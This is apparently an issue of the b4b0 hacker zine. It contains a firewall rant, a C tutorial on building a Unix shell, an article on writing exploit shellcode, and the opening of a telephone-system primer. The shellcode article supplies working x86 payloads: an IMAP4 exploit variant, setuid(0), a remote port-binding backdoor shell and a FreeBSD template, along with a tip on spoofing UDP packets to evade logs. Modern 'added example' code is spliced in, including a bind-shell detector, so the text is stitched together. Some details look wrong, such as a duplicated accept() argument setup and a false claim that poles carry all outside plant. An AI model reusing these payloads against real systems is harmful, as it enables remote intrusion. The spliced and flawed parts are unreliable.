"Firewalls make computers secure. This computer isn't secure. Obviously,
the firewall you made doesn't work."
He just didn't get it. I would have been more than happy to spend the
time to audit all the machines individually, apply the proper patches,
and fix any configuration errors that may rear their ugly heads, if the
client was willing to pay for my time. Hell, I'd even work hard!
Unfortunately, the client didn't want to hear that. He wanted his "magic
bullet," and if I wasn't willing to provide it, he'd hire another consulting
company to do it.
It then occurred to me, that this scenario is being played out all
over the net, and it's a lot bigger than I had previously realized. I was
playing a part, so was the IS director, so was my company, and so was the
firewall.
Corporate America is all about "covering your ass." No one wants
accountability for anything. If bullshit and 'passing the buck' were the
keys to world domination, the USA would be the world's only super power.
Wait, never mind...
Anyway, this is what hit me. Firewalls do a lot more than filter
packets and give IS gimps a warm fuzzy feeling when they go home at night.
Firewalls manage to almost universally remove any traces of accountability
in corporate security. As in the above example, if, I mean when, someone
sniffs the root password and uses it to compromise the LAN, the IS
department can pretend that they weren't at fault. They can pass the buck to me
or my company. Fortunately, there is a contract protecting us from lawsuits
of that nature. If necessary, the buck can even be passed, either by my
company or the clients, to the vendor. Even they can pass the buck, since
any rational person would realize that they weren't involved in this
morass.
The myth of the "firewall as a magic bullet" is some of the most
useful bullshit ever spun. It allows everyone to sleep easier at night
and make a lot of money. Of course, the buck ultimately stops getting
passed by another piece of bullshit, the myth of "the genius hacker." I'm
not saying that there aren't some genuinely brilliant people breaking into
computers these days, but chances are they aren't relying on a 5 year old
sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly
enough to have a guessable NIS mapname.
The world is very broken. We have security products that either
simply don't work, don't work up to the impossible expectations put on
them, or even introduce further holes in hosts and networks they are supposed
to be protecting. We also have a world of corporate IS managers, mostly
incompetent "security consultants", and talentless bullshit artists
who manage to social engineer their way into six figure incomes because
they are "reformed hackers."
It would be nice if some kind of messiah of the computer age were to
come along and make it all better. Unfortunately, that's not going to
happen. If there was such a person, we'd either nail him to a cross or he
would opt for the huge paycheck which comes with playing a part in the
system. I suspect I have finally entered into adult life, because I have
little or no desire to change an awful system that I can not fix. There
are quite a bit of rewards for being as corrupt as everyone else. So here
is the choice facing us all, either sit down at the table of corruption
and shared guilt and get paid a lot (basically sell out) or fight a
hopeless battle against American corporate culture. I think adulthood is
really choosing to play in the "bullshit playground" with the rest of
the grownups. Today, I am a man.
Rhinestone Cowboy
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> Coding a Shell from the Ground Up, by ph1x <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
In this article I am going to discuss what a shell is and how a shell
works, and we're going to build a shell from the ground up.
For all the source we're going to be writing today, we will need b4b0shell.h,
included below.
Let's get started. A shell is a program that does command
interpretation. A shell can also be referred to as a command processor,
as most DOS users know. It reads input, then executes the command.
Executing a command basically means creating a child process for
the execution. For example, the shell will fork() a child process to
execute the command. The parent (the shell) will then wait for its child
to finish before it reads another command. Before we start coding, make
sure you're using the following header file in all of your codez.
/**********************************/
/* Header file for the b4b0 shell */
/* Extrapolated from ush.h, and */
/* added onto. ph1x@b4b0.org */
/**********************************/
/*
NOTE: We won't be making use of this whole header file today;
our shell is not going to have the complexity of the
standard unix shell that you use on a day to day
basis.
*/
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/wait.h>
#include <limits.h>
#define STDMODE 0600
#define DELIMITERSET " ><|&" // we are only going to add redirection to
// our shell, not background or pipe support
#ifndef MAX_CANON
#define MAX_CANON 256
#endif
#define TRUE 1
#define FALSE 0
#define BLANK_STRING " "
#define PROMPT_STRING "b4b0$"
#define QUIT_STRING "quit"
#define BACK_STRING "&" // for background process
#define PIPE_STRING "|" // pipe support
#define NEWLINE_STRING "\n"
#define IN_REDIRECT_SYMBOL '<' //redirection
#define OUT_REDIRECT_SYMBOL '>' // symbols
#define NULL_SYMBOL '\0'
#define PIPE_SYMBOL '|'
#define BACK_SYMBOL '&'
#define NEWLINE_SYMBOL '\n'
int makeargv(char *s, char *delimiters, char ***argvp);
int parsefile(char *inbuf, char delimiter, char **v); // this will return
// the token following delimiter if its present in *s.
int redirect(char *infilename, char *outfilename); // performs redirection
int connectpipeline(char *cmd, int frontfd[], int backfd[]);
/*************************-=EOF=-******************************/
First we will write an extremely basic command interpreter,
just for you to get a basic idea as to how a shell calls
a child process to execute commands, and for you to experiment
with.
---------------------------bsh v1.0-----------------------------------
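#include "b4b0shell.h"
#define MAX_BUF 500
int main(void) {
    char input[MAX_BUF];
    char **rargv;
    while(1) {
        fprintf(stderr, "%s\n", PROMPT_STRING);
        fgets(input, MAX_BUF, stdin);
        /* drop the newline fgets() keeps, so "quit" and argv[0] can match */
        input[strcspn(input, NEWLINE_STRING)] = NULL_SYMBOL;
        if(strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if(fork() == 0) {
                /* no error check on execvp() in this version */
                if(makeargv(input, BLANK_STRING, &rargv) > 0)
                    execvp(rargv[0], rargv);
            }
            wait(NULL);
        }
    }
    exit(0);
}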
--------------------------------EOF-----------------------------------------
Pretty simple, huh? When you run it, go ahead and execute some basic
programs, like ls, grep, find etc. It works! Now, as I said before,
this is a very raw basic shell, and does not support wildcards like
'*' or '?'. Also, it doesn't support certain commands like 'cd', which
is available in any good shell. If by some chance the wait() isn't called?
Well, not too much of a problem, but if a user enters a command before
the previous one is executed, the commands will execute concurrently
(read my article on concurrency). Also, due to the fact that this
first version we wrote does not find errors on the execvp() call,
it gets fucked up if you enter an invalid command. execvp() returns on
failure, so your shell won't get control back from the child process and
the child process carries on as its OWN shell. So you have to type 'quit'
to get back to your parent shell. Let's write a better version of this
shell that handles errors with execvp(), and we will also replace the
#define'd MAX_BUF with MAX_CANON (located in b4b0shell.h), because
MAX_BUF is nonportable.
----------------------------bsh v2.0-------------------------------------
#include "b4b0shell.h"
void execthecommand(char *incmd) {
    char **rargv;
    if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        /* execvp() only returns when it fails */
        if(execvp(rargv[0], rargv) == -1) {
            printf("Invalid command\n");
            exit(1);
        }
    }
    exit(1);
}
int main(void) {
    char input[MAX_CANON];
    pid_t child_pid;
    while(1) {
        fputs(PROMPT_STRING, stdout);
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        /* strip the trailing newline left by fgets() */
        if(*(input + strlen(input) - 1) == NEWLINE_SYMBOL)
            *(input + strlen(input) - 1) = 0;
        if(strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            }
            else if(child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF-----------------------------------------
We made several changes to version 2 of our shell. Notice we used fputs()
instead of fprintf() for the command line. fputs() prints a defined string
a lot faster. Also, notice we did some more error checking in this version.
Also notice we now have the function execthecommand() to replace the
original execvp() and makeargv() calls. Control will never come back
from the function execthecommand(), so you shouldn't be having a problem
when you enter invalid commands.
Unix deals with input/output through file descriptors. A program has to
open a file or a device before it can access it. It will then access
the file using a handle that is returned by the open() syscall. With
the support of redirection, you can do stuff like this.
b4b0$ cat < input.txt > output.txt
That command takes its standard input from 'input.txt' and sends its
output to 'output.txt'.
The following is a revised version of the execthecommand() function that you
can use to support redirection. I basically made execthecommand() parse
*incmd, which might contain redirection. It then calls redirect()
to perform the actual redirection, and makeargv() to create the command
array. It then execs the command.
-----------------------------execthecommand() v2.0 by ph1x--------------------
#include "b4b0shell.h"
void execthecommand(char *incmd)
{
    char **rargv;
    char *infile;
    char *outfile;
    /* pull "< file" and "> file" out of the command line first */
    if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if(redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    else if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if(execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}
--------------------------EOF---------------------------------------------
Change the execthecommand() in bsh v2.0 to the one I modified for
redirection support.
Let's take a look at our final shell.
--------------------------bsh v3.0--------------------------------------
#include "b4b0shell.h"
void execthecommand(char *incmd)
{
    char **rargv;
    char *infile;
    char *outfile;
    /* pull "< file" and "> file" out of the command line first */
    if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if(redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    else if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if(execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}
int main(void) {
    char input[MAX_CANON];
    pid_t child_pid;
    while(1) {
        fputs(PROMPT_STRING, stdout);
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        /* strip the trailing newline left by fgets() */
        if(*(input + strlen(input) - 1) == NEWLINE_SYMBOL)
            *(input + strlen(input) - 1) = 0;
        if(strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            }
            else if(child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF--------------------------------------
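b4b0shell.h declares makeargv(), parsefile() and redirect(), but the article never defines them, so bsh does not link as printed. One way to write them follows, as an added example that is not ph1x's code: parsefile() follows the header comment, run_line() and attach() are hypothetical helper names, and the /tmp path is a constructed sample.

```c
/* Added example: one way to write the helpers b4b0shell.h only declares. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define STDMODE 0600            /* both values copied from b4b0shell.h */
#define DELIMITERSET " ><|&"

/* Split s on delimiters into a NULL-terminated vector; returns the token
 * count or -1. s is not modified: the tokens point into a private copy. */
int makeargv(char *s, char *delimiters, char ***argvp)
{
    size_t len = strlen(s);
    char *copy = malloc(len + 1), *p;
    char **argv = calloc(len / 2 + 2, sizeof *argv);   /* worst case "a b c" */
    int n = 0;
    *argvp = NULL;
    if (copy == NULL || argv == NULL) { free(copy); free(argv); return -1; }
    strcpy(copy, s);
    for (p = copy + strspn(copy, delimiters); *p; p += strspn(p, delimiters)) {
        argv[n++] = p;
        p += strcspn(p, delimiters);
        if (*p != '\0') *p++ = '\0';
    }
    *argvp = argv;              /* argv[n] is already NULL (calloc) */
    return n;
}

/* If delimiter occurs in inbuf, cut it and the filename that follows out of
 * inbuf and return the filename in *v (NULL when the delimiter is absent).
 * -1 means a missing filename or the same operator used twice. */
int parsefile(char *inbuf, char delimiter, char **v)
{
    char *p, *start;
    size_t len;
    *v = NULL;
    if ((p = strchr(inbuf, delimiter)) == NULL)
        return 0;
    start = p + 1 + strspn(p + 1, " ");
    len = strcspn(start, DELIMITERSET);
    if (len == 0 || strchr(start + len, delimiter) != NULL ||
        (*v = malloc(len + 1)) == NULL)
        return -1;
    memcpy(*v, start, len);
    (*v)[len] = '\0';
    memmove(p, start + len, strlen(start + len) + 1);
    return 0;
}

/* Open path and move the descriptor onto target (stdin or stdout). */
static int attach(const char *path, int flags, int target)
{
    int fd = open(path, flags, STDMODE);    /* new files are owner-only */
    int rc = (fd == -1) ? -1 : (fd == target) ? 0 : dup2(fd, target);
    if (fd != -1 && fd != target)
        close(fd);                          /* keep only the duplicate */
    return rc == -1 ? -1 : 0;
}

int redirect(char *infilename, char *outfilename)
{
    if (infilename != NULL && attach(infilename, O_RDONLY, STDIN_FILENO) == -1)
        return -1;
    if (outfilename != NULL &&
        attach(outfilename, O_WRONLY | O_CREAT | O_TRUNC, STDOUT_FILENO) == -1)
        return -1;
    return 0;
}

/* One pass of the shell loop: fork, then parse, redirect and exec in the
 * child. Returns the child's exit status (1 on any failure, as on the page). */
int run_line(const char *line)
{
    char buf[256], *in, *out, **argv;       /* 256: MAX_CANON fallback */
    pid_t pid; int status;

    if (strlen(line) >= sizeof buf || (pid = fork()) == -1)
        return -1;
    if (pid == 0) {
        strcpy(buf, line);
        if (parsefile(buf, '<', &in) == 0 && parsefile(buf, '>', &out) == 0 &&
            redirect(in, out) == 0 && makeargv(buf, " ", &argv) > 0)
            execvp(argv[0], argv);
        _exit(1);       /* exec, or a step before it, failed */
    }
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    return run_line("echo b4b0 > /tmp/b4b0_demo.txt") != 0 ||
           run_line("grep -q b4b0 < /tmp/b4b0_demo.txt") != 0;
}
```

The child leaves through _exit() rather than exit() so that stdio buffers inherited from the parent are not flushed a second time.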
Redirection is the last feature we are going to put in our shell.
Unfortunately, I was busy as hell getting b4b0 7 together, and I
didn't have much time to add support for pipes, background processes,
job control (allows a user to move the foreground process group into
the background, and vice versa), or most of the other things that
a good shell features. This was merely for your learning and enjoyment.
Hope you gained something out of it. Feel free to look up the functions
in b4b0shell.h that we didn't use, and extend onto your shell.
Bye. HEH!@#$
ph1x@b4b0.org
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> The Art of Making Shell Code, by smiler <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hopefully you are familiar with generic shell-spawning shellcode. If not
read Aleph's text "Smashing The Stack For Fun And Profit" before
reading further. This article will concentrate on the types of shellcode
needed to exploit daemons remotely. Generally it is much harder to exploit
remote daemons, because you do not have many ways of finding out the
configuration of the remote server. Often the shellcode has to be much
more complicated, which is what this article will focus on.
I will start by looking at the ancient IMAP4 exploit. This is a fairly
simple exploit. All you need to do is "hide" the "/bin/sh" string in
shellcode (imapd converts all lowercase characters into uppercase).
None of the instructions in the generic shell-spawning shellcode contain
lower-case characters, so all you need do is change the /bin/sh
string.
It is the same as normal shellcode, except there is a loop which adds
0x20 to each byte in the "/bin/sh" string. I put in lots of comments so
even beginners can understand it. Sorry to all those asm virtuosos :]
-----imap.S-------
.globl main
main:
jmp call
start:
popl %ebx /* get address of /bin/sh */
movl %ebx,%ecx /* copy the address to ecx */
addb $0x6,%cl /* ecx now points to the last character */
loop:
cmpl %ebx,%ecx
jl skip /* if (ecx<ebx) goto skip */
addb $0x20,(%ecx) /* adds 0x20 to the byte pointed to by %ecx */
decb %cl /* move the pointer down by one */
jmp loop
skip:
/* generic shell-spawning code */
movl %ebx,0x8(%ebx)
xorl %eax,%eax
movb %eax,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
xorl %eax,%eax
inc %al
int $0x80
call:
call start
.string "\x0f\x42\x49\x4e\x0f\x53\x48"
--------------
This was a very simple variation on the generic shellcode and can be
useful to mask characters that aren't allowed by the protocol the daemon
uses. But when coding remote, or even local, exploits you have to be
prepared to write code which is much more complex. This usually means
writing shellcode that involves different syscalls.
Useful syscalls are:
setuid(): To regain dropped root privileges (e.g. wu-ftpd)
mkdir()/chdir()/chroot(): To drop back to root directory (e.g. wu-ftpd)
dup2(): To connect a tcp socket to the shell (e.g. BIND&rpc.mountd tcp-style)
open()/write(): To write to /etc/passwd (e.g. everything !)
socket(): To write connectionless shellcode, as explained later.
The actual syscall numbers can be found in <asm/unistd.h>
Most syscalls in linux x86 are done in the same way. The syscall number
is put into register %eax, and the arguments are put into %ebx,%ecx and
%edx respectively. In some cases, where there are more arguments than
registers it may be necessary to store the arguments in user memory and
store the address of the arguments in the register. Or, if an argument
is a string, you would have to store the string in user memory and pass
the address of string as the argument. As before, the syscall is called
by "int $0x80".
You can potentially use any syscall, but the ones mentioned above should
just about be the only ones you will ever need.
As an example, here's a little shellcode snippet from my wu-ftpd exploit
that should execute setuid(0).
Note: you should always zero a register before using it.
---setuid.S----
.globl main
main:
xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */
movl %ebx,%eax /* zero out the %eax register */
movb $0x17,%al /* set the syscall number */
int $0x80 /* call the interrupt handler */
---------------
Port-Binding Shellcode
When you are exploiting a daemon remotely with generic shellcode, it is
necessary to have an active TCP connection to pipe the shell stdin/out/err
over. This is applicable to all the remote linux exploits I've seen so
far, and is the preferred method.
But it is possible that a new vulnerability may be found, in a daemon
that only offers a UDP service (SNMP for example). Or it may only be
possible to access the daemon via UDP because the TCP ports are
firewalled etc. Current linux remote vulnerabilities are exploitable
via UDP - BIND as well as all rpc services run both UDP and TCP
services. Also, if you send the exploit via UDP it is trivial to spoof the
attacking udp packet so that you do not appear in any logs =)
To exploit daemons via UDP you could write shellcode to modify the
password file or to perform some other cunning task, but an interactive
shell is much more elite =] Clearly it is not possible to fit a UDP pipe
into shellcode, you still need a TCP connection. So my idea was to write
shellcode that behaved like a very rudimentary backdoor, it binds to a
port and executes a shell when it receives a connection.
I know for a fact that I wasn't the first one to write this type of
shellcode, but no one has officially published it so...here goes.
A basic bindshell program (without the style) looks like this:
int main()
{
char *name[2];
int fd,fd2,fromlen;
struct sockaddr_in serv;
fd=socket(AF_INET,SOCK_STREAM,0);
serv.sin_addr.s_addr=0;
serv.sin_port=1234;
serv.sin_family=AF_INET;
bind(fd,(struct sockaddr *)&serv,16);
listen(fd,1);
fromlen=16; /*(sizeof(struct sockaddr)*/
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
/* "connect" fd2 to stdin,stdout,stderr */
dup2(fd2,0);
dup2(fd2,1);
dup2(fd2,2);
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0],name,NULL);
}
Obviously, this is going to require a lot more space than normal
shellcode, but it can be done in under 200 bytes and most buffers are
quite a bit larger than that.
There is a slight complication in writing this shellcode as socket
syscalls are done slightly differently than other syscalls, under linux.
Every socket call has the same syscall number, 0x66. To differentiate
between different socket calls, a subcode is put into the register %ebx.
These can be found in <linux/net.h>. The important ones being:
SYS_SOCKET 1
SYS_BIND 2
SYS_LISTEN 4
SYS_ACCEPT 5
We also need to know the values of the constants, and the exact
structure of sockaddr_in. Again these are in the linux include files.
AF_INET == 2
SOCK_STREAM == 1
struct sockaddr_in {
    short int sin_family;        /* 2 byte word, containing AF_INET */
    unsigned short int sin_port; /* 2 byte word, containing the port in
                                    network byte order */
    struct in_addr sin_addr;     /* 4 byte long, should be zeroed */
    unsigned char pad[8];        /* should be zero, but doesn't really matter */
};
Since there are only two registers left, the arguments must be placed
sequentially in user memory, and %ecx must contain the address of the
first. Hence we have to store the arguments at the end of the shellcode.
The first 12 bytes will contain the 3 long arguments, the next 16 will
contain the sockaddr_in structure and the final 4 will contain fromlen
for the accept() call. Finally the result from each syscall is held in
%eax.
So, without further ado, here is the portshell warez...
Again I've over-commented everything.
----portshell.S----
.globl main
main:
/* I had to put in a "bounce" in the middle of the code as the shellcode
* was too big. If I had made it jmp the entire shellcode, the instruction
* would have contained a null byte, so if anyone has a shorter version,
* please send me it.
*/
jmp bounce
start:
popl %esi
/* socket(2,1,0) */
xorl %eax,%eax
movl %eax,0x8(%esi) /* 3rd arg == 0 */
movl %eax,0xc(%esi) /* zero out sock.sin_family&sock.sin_port */
movl %eax,0x10(%esi) /* zero out sock.sin_addr */
incb %al
movl %eax,%ebx /* socket() subcode == 1 */
movl %eax,0x4(%esi) /* 2nd arg == 1 */
incb %al
movl %eax,(%esi) /* 1st arg == 2 */
movw %eax,0xc(%esi) /* sock.sin_family == 2 */
leal (%esi),%ecx /* load the address of the arguments into %ecx */
movb $0x66,%al /* set socket syscall number */
int $0x80
/* bind(fd,&sock,0x10) */
incb %bl /* bind() subcode == 2 */
movb %al,(%esi) /* 1st arg == fd (result from socket()) */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes to point to sockaddr struct */
movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */
movb $0x23,0xe(%esi) /* set sin.port */
movb $0x66,%al /* no need to set %ecx, it is already set */
int $0x80
/* listen(fd,2) */
movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */
incb %bl /* no need to set 1st arg, it is the same as bind() */
incb %bl /* listen() subcode == 4 */
movb $0x66,%al /* again, %ecx is already set */
int $0x80
/* fd2=accept(fd,&sock,&fromlen) */
incb %bl /* accept() subcode == 5 */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes */
movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */
addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */
movb $0x66,%al
int $0x80
/* KLUDGE */
jmp skippy
bounce:
jmp call
skippy:
/* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
movb %al,%bl /* move fd2 to 1st arg */
xorl %ecx,%ecx /* 2nd arg is 0 */
movb $0x3f,%al /* set dup2() syscall number */
int $0x80
incb %cl /* 2nd arg is 1 */
movb $0x3f,%al
int $0x80
incb %cl /* 2nd arg is 2 */
movb $0x3f,%al
int $0x80
/* execve("/bin/sh",["/bin/sh"],NULL) */
movl %esi,%ebx
addb $0x20,%ebx /* %ebx now points to "/bin/sh" */
xorl %eax,%eax
movl %ebx,0x8(%ebx)
movb %al,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
/* exit(0) */
xorl %eax,%eax
movl %eax,%ebx
incb %al
int $0x80
call:
call start
.ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
-----------------------------------------------------
Once you have sent the exploit, you only need to connect to port 8960, and
you have an interactive shell.
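Seen from the monitoring side, the payload above is one process doing bind, listen, accept, three dup2 calls onto the accepted socket and then execve, whereas a fork-per-connection server such as inetd does the dup2/execve part in a child pid. The scanner below is an added example, not code from the article: it assumes Linux audit SYSCALL records for an i386 task with rules covering these syscalls, and every sample record is constructed.

```c
/* Added example: constructed audit records, i386 syscall numbering. */
#include <stdlib.h>
#include <string.h>

#define NR_EXECVE     0x0b   /* syscall numbers as given in the article */
#define NR_DUP2       0x3f
#define NR_SOCKETCALL 0x66
enum { SUB_BIND = 2, SUB_LISTEN = 4, SUB_ACCEPT = 5 };           /* subcodes */
enum { ST_BIND = 1, ST_LISTEN = 2, ST_ACCEPT = 4, ST_DUP = 8 };  /* ST_DUP << fd */
#define ST_COMPLETE 0x3f     /* three socket stages plus dup2 onto 0, 1 and 2 */
#define MAX_PIDS 64

struct proc { unsigned long pid, connfd; unsigned stages; };

/* Parse "key=<number>"; key must start a field so that "pid" does not match
 * inside "ppid". Returns 1 when a value was read. */
static int field(const char *rec, const char *key, int base, unsigned long *out)
{
    size_t klen = strlen(key);
    const char *p;
    char *end;
    for (p = rec; (p = strstr(p, key)) != NULL; p += klen) {
        if ((p == rec || p[-1] == ' ') && p[klen] == '=') {
            *out = strtoul(p + klen + 1, &end, base);
            return end != p + klen + 1;
        }
    }
    return 0;
}

static struct proc *lookup(struct proc *tab, size_t *used, unsigned long pid)
{
    size_t i;
    for (i = 0; i < *used; i++)
        if (tab[i].pid == pid) return &tab[i];
    if (*used == MAX_PIDS) return NULL;   /* table full: pid not tracked */
    memset(&tab[*used], 0, sizeof tab[0]);
    tab[*used].pid = pid;
    return &tab[(*used)++];
}

/* Count processes that ran the whole sequence themselves; *hit = last pid. */
int scan_audit(const char *const recs[], size_t n, unsigned long *hit)
{
    struct proc tab[MAX_PIDS], *p;
    unsigned long nr, pid, a0, a1, ret;
    size_t used = 0, i;
    int alerts = 0;

    for (i = 0; i < n; i++) {
        const char *r = recs[i];
        if (!strstr(r, "arch=40000003") || !strstr(r, "success=yes") ||
            !field(r, "syscall", 10, &nr) || !field(r, "pid", 10, &pid) ||
            !field(r, "a0", 16, &a0) || !(p = lookup(tab, &used, pid)))
            continue;        /* not a successful i386 syscall record */
        if (nr == NR_SOCKETCALL && a0 == SUB_BIND) {
            p->stages |= ST_BIND;
        } else if (nr == NR_SOCKETCALL && a0 == SUB_LISTEN && (p->stages & ST_BIND)) {
            p->stages |= ST_LISTEN;
        } else if (nr == NR_SOCKETCALL && a0 == SUB_ACCEPT &&
                   (p->stages & ST_LISTEN) && field(r, "exit", 10, &ret)) {
            p->stages |= ST_ACCEPT;
            p->connfd = ret; /* accept() returns the connected socket */
        } else if (nr == NR_DUP2 && (p->stages & ST_ACCEPT) && a0 == p->connfd &&
                   field(r, "a1", 16, &a1) && a1 <= 2) {
            p->stages |= ST_DUP << a1;
        } else if (nr == NR_EXECVE) {
            if (p->stages == ST_COMPLETE) { alerts++; *hit = pid; }
            p->stages = 0;   /* new program image: start over */
        }
    }
    return alerts;
}

#define R(rest) "type=SYSCALL msg=audit(1700000000.000:1): arch=40000003 " rest
static const char *const SAMPLE[] = {   /* constructed, fields trimmed */
    R("syscall=102 success=yes exit=0 a0=2 a1=bffff6c0 ppid=1 pid=412 comm=\"named\""),
    R("syscall=102 success=yes exit=0 a0=4 a1=bffff6c0 ppid=1 pid=412 comm=\"named\""),
    R("syscall=102 success=yes exit=0 a0=2 a1=bfffe100 ppid=1 pid=300 comm=\"inetd\""),
    R("syscall=102 success=yes exit=0 a0=4 a1=bfffe100 ppid=1 pid=300 comm=\"inetd\""),
    R("syscall=102 success=yes exit=6 a0=5 a1=bffff6c0 ppid=1 pid=412 comm=\"named\""),
    R("syscall=63 success=yes exit=0 a0=6 a1=0 ppid=1 pid=412 comm=\"named\""),
    R("syscall=63 success=yes exit=1 a0=6 a1=1 ppid=1 pid=412 comm=\"named\""),
    R("syscall=63 success=yes exit=2 a0=6 a1=2 ppid=1 pid=412 comm=\"named\""),
    R("syscall=102 success=yes exit=4 a0=5 a1=bfffe100 ppid=1 pid=300 comm=\"inetd\""),
    R("syscall=63 success=yes exit=0 a0=4 a1=0 ppid=300 pid=301 comm=\"inetd\""),
    R("syscall=63 success=yes exit=1 a0=4 a1=1 ppid=300 pid=301 comm=\"inetd\""),
    R("syscall=63 success=yes exit=2 a0=4 a1=2 ppid=300 pid=301 comm=\"inetd\""),
    R("syscall=11 success=yes exit=0 a0=80a3f40 ppid=300 pid=301 comm=\"in.ftpd\""),
    R("syscall=11 success=yes exit=0 a0=bffff6e0 ppid=1 pid=412 comm=\"sh\""),
};
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

int main(void)
{
    unsigned long pid = 0;
    return scan_audit(SAMPLE, SAMPLE_LEN, &pid) == 1 && pid == 412 ? 0 : 1;
}
```

Audit prints a0 and a1 in hex and exit in decimal, which is why the accepted descriptor and the dup2 source are parsed with different bases before being compared.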
----------------[ FreeBSD shellcode
Just in case all of that was all old hat to you, I'll take a little
foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most
ways completely different. Primarily because syscalls are done by pushing
arguments onto the stack and using a far call. The syscall number
still goes in the %eax register however. OpenBSD is much the same but
it uses an interrupt for syscalls.
The main complication in writing shellcode for FreeBSD is in the far
call (instruction lcall 7,0) which contains 5 null bytes. Obviously
you would need to write some basic self-modifying shellcode. Since this is
going to be used in every syscall you make, it's best to put this into a
mini-function and call it whenever necessary. I wrote a little template
for this, it's easy enough to make it execute a shell or bind to a port.
Just in case you're wondering, the syscall number for execve is 0x3b.
----fbsd.S----
.globl main
main:
jmp call
start:
/* Modify the ascii string so it becomes lcall 7,0 */
popl %esi
xorl %ebx,%ebx
movl %ebx,0x1(%esi) /* zeroed long word */
movb %bl,0x6(%esi) /* zeroed byte */
movl %esi,%ebx
addb $0x8,%bl /* ebx points to binsh */
jmp blah /* start the code */
call:
call start
syscall:
.ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */
ret
binsh:
.ascii "/bin/sh...."
blah:
/* put shellcode here */
call syscall
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0> The Telephone System/Network Part 1, by pabell <b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
THE TELEPHONE SYSTEM OR NETWORK
This paper was written mainly because of the lack of real information
kicking around on and off the net about phone systems and networks.
This is part one, of a two-part primer on phone systems. This is a
very introductory paper. I don't go into great detail, but cover the
basics and a first look at phone networks and systems.
If you really haven't been exposed to the telephony industry, this
paper may be ominous. For the purpose of this paper I have broken
the telephone network into three basic components.
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
In this paper we will look at each of the three sections.
Section three the INSIDE PLANT FACILITIES will be covered in detail
throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT
FACILITIES sections of the telephone network will be explained briefly
in general terms. Most of the parts of the telephone system or network
will already be familiar to you even without realizing it. You have a
phone of some description in your home or office, which is part of
the INSIDE PLANT FACILITIES section of the telephone network.
The INSIDE PLANT FACILITIES consists of all the cable, hardware,
telephone sets or equipment in the building or between buildings on
the same piece of property. The part of the network, which connects
buildings of various shapes and descriptions together, is called THE
OUTSIDE PLANT FACILITIES. Poles and associated wires are the only
type of outside plant distribution system in use today.
The remaining part you may not know about, or at least think you don't
know about, is the Central Switching Machine. The basic telephone circuit
is a Two Wire Circuit, which connects every telephone set, through the
Outside Plant Facilities to a Central Switch. This two-wire circuit is
